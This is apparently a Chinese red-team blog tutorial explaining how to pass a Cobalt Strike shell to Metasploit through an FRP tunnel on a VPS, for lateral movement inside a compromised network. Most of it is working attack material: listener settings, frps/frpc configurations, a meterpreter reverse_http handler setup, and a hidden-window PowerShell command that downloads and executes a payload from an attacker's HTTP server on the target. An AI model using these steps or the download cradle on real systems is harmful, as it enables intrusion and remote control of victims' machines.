msf作为内网渗透中强大的工具,集成了许多漏洞利用的EXP,以及各种扫描功能便于使用,今天介绍使用Frp将cs的shell派生到msf,满足内网渗透中的需求。
第一步:
首先我们连上cs后,我们需要去监听器修改参数。
我们这里Add添加一个,随便写个名字,这里我写了msf,模式选择foreign HTTP模式,HTTP Host出填写自己的VPS地址,端口随意,我这里是1080端口。填写完毕Save即可。
第二步:
在自己的vps上启动frp服务端,frp不多做介绍,目前主流的内网穿透工具,这里基础使用方式以及命令不做介绍,需要了解百度即可。这里我们去修改frp.ini里面信息:vim frp.ini 端口随意,我们这里配置为7222端口。
我们启动它即可:./frps -c frps.ini
接下来我们去kali中去配置Frp客户端的frpc.ini文件,如下图配置
[common]
server_addr = 11.11.11.11(VPS地址)
server_port = 7222
[msf]
type = tcp
local_ip=127.0.0.1
local_port=1234
remote_port =1080
此时我们在kali中启动客户端
./frpc -c frpc.ini
第三步:
为了更方便演示本文要表达的重点,我们这就直接powershell上线为大家演示派生到msf的步骤。
直接生成powershell,去目标机器执行上线。
powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://192.168.11.111:80/a’))”
第四步:
上线以后,我们就可以选择性看自己是否在内网渗透中,需要msf的帮助,然后可以利用FRP将cs的shell派生到msf中,实现联动了。
我们去kali启动msf,并做相应配置
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_http //这里一定要用http
set LHOST 127.0.0.1 //这里是监听本地地址即可
set LPORT 1234 //端口需要跟前面frp配置的端口对应
run
set LPORT 1234这一块对应的端口就是前面配置frp时候的local_port=1234
然后我们就可以在msf中 run一下了
此时我们点击cs中的增加会话,当然我这里是中文的cs,英文原版中对应的是spawn
我们choose我们配置好的监听器选中点击即可
此时回到msf,稍微等一会meterpreter 就来了。
好了,现在就实现了cs的shell派生到msf上。可以愉快的通过msf横向了。
参考:
https://mp.weixin.qq.com/s/D_z4kmY2qvE6rw1yed-ZLg
总结:
1.为什么不多介绍一个msf派生到cs的方式?
因为实战中,渗透师傅们更喜欢用cs来操作,界面友好,所以本着一切以实际的攻防实战经验为主,故不介绍msf派生到cs的方式。
2.派生shell的方式不止一种,这里向大家演示的是本人平时最喜欢用的一种,也是个人认为最简单易懂的方式,总而言之,内网渗透的本质就是对机器的信息收集,所以要在转换攻击思路与方式中,也要注重收集时候的动静。
3.只会敲一些干货给大家,写作不易,喜欢转载加收藏即可,希望可以帮助大家在实战中应用起来。
欢迎大家关注个人公众号,本人致力于红队安全攻防的研究,每日分享技术干货,绝不水文,愿对你有所帮助!